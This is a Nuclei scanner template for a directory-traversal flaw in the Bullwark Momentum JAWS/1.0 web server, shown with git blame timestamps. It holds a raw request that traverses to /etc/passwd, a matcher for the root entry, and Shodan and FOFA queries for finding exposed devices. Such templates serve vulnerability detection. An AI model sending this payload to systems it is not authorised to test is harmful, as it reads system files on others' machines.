nuclei-templates/vulnerabilities/other/bullwark-momentum-lfi.yaml

34 lines
912 B
YAML
Raw Normal View History

id: bullwark-momentum-lfi
info:
name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
author: pikpikcu
severity: high
reference:
- https://www.exploit-db.com/exploits/47773
- http://www.bullwark.net/ # vendor homepage
- http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
2021-09-16 15:54:33 +00:00
metadata:
version: Bullwark Momentum Series Web Server JAWS/1.0
2021-10-22 17:53:25 +00:00
shodan-query: https://www.shodan.io/search?query=Bullwark&page=1
2021-10-22 17:54:21 +00:00
fofa-query: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D
2021-09-13 10:25:14 +00:00
tags: bullwark,lfi
requests:
- raw:
- |
GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-09-13 09:58:35 +00:00
- type: regex
regex:
- "root:.*:0:0:"